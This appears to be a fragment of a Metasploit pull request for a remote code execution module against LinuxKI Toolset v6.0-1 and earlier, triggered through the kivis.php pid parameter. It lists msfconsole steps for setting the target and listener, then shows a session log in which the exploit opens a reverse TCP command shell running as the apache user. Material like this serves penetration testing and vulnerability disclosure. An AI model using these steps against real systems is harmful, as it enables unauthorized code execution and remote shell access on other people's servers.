           'DisclosureDate' => 'May 17 2020',


### PR DESCRIPTION
LinuxKI Toolset v6.0-1 and earlier is vulnerable to a remote code execution. The point where the security vulnerability is triggered is the kivis.php pid parameter.

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/linuxki_rce`
- [ ] `show TARGETS`
- [ ] `set TARGET <id>`
- [ ] `set RHOST <target_ip>`
- [ ] `set RPORT <target_port>`
- [ ] Ideally run `check`
- [ ] `set LHOST <your_ip>`
- [ ] `set LPORT <your_port>`
- [ ]  `exploit`

## Scenarios
```
msf5 > use exploit/linux/http/linuxki_rce
msf5 exploit(linux/http/linuxki_rce) > set rhosts 10.0.0.1
rhosts => 10.0.0.1
msf5 exploit(linux/http/linuxki_rce) > set rport 8080
rport => 8080
msf5 exploit(linux/http/linuxki_rce) > check
[+] 10.0.0.1:8080 - The target is vulnerable.
msf5 exploit(linux/http/linuxki_rce) > set lhost 10.0.0.5
lhost => 10.0.0.5
msf5 exploit(linux/http/linuxki_rce) > run
[*] Started reverse TCP handler on 10.0.0.5:4444
[*] Sending exploit...
[*] Command shell session 1 opened (10.0.0.5:4444 -> 10.0.0.1:58914) at 2020-05-19 08:32:32 +0300
id
uid=48(apache) gid=48(apache) groups=48(apache)
```